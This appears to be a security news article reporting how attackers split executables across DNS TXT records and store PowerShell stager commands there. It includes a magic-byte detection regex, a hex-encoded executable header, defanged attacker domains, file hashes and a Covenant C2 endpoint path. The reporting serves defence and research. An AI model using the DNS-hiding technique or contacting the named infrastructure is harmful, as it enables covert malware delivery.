Hackers Exploit DNS Blind Spots to Conceal and Deliver Malware

Security researchers have discovered a sophisticated technique in which cybercriminals exploit DNS (Domain Name System) infrastructure to conceal malware and command-and-control communications.

Analysis of passively collected DNS records from DNSDB Scout revealed that attackers are partitioning files and storing them in DNS TXT records, creating an unwitting storage mechanism that persists until DNS servers remove or overwrite the records.

Advanced File Fragmentation Technique Discovered

The investigation began with reports of images being hidden in DNS records, prompting researchers to search for magic file bytes in hexadecimal format across various executable and common file types.

Using sophisticated regex patterns such as ^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(4749463861.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,})), researchers identified TXT records beginning with executable file header sequences.

A significant finding from 2021-2022 data revealed TXT records containing the magic sequence

C83464356139303030303330303030303030343030303030306666666630303030623830303030303030303030303030303430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030306538303030303030306531666261306530306234303963643231623830313463636432313534363836393733323037303732366636373732363136643230363336313665366536663734323036323635 

for executable file headers.

This same header value appeared across three different domains, each sharing identical subdomain patterns.

ScreenMate Malware Distribution Network

Analysis of the domain “*.felix.stf.whitetreecollective[.]com” revealed hundreds of iterated subdomain integer values, each containing different TXT RDATA values.

This suggested that the attackers were fragmenting executable files across subdomains, using integer values to maintain the correct sequence order.

By reconstructing these fragments, researchers identified two SHA256 file hashes:

7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866 and e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1.

Both files were identified as Joke Screenmate malware, which simulates destructive actions through fake error messages, interferes with user control by being difficult to close, displays unsolicited content, and can cause system performance issues.

Command-and-Control Infrastructure in DNS

Further investigation revealed malicious commands stored in TXT records, particularly associated with drsmitty[.]com domains.

One subdomain’s TXT record contained an encoded PowerShell script functioning as a stager, connecting to cspg[.]pw and requesting the default Covenant C2 server endpoint /api/v1/nps/payload/stage1.

This technique demonstrates how DNS infrastructure can be weaponized for persistent malware communications while evading traditional detection methods.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates

The post Hackers Exploit DNS Blind Spots to Conceal and Deliver Malware appeared first on Cyber Security News.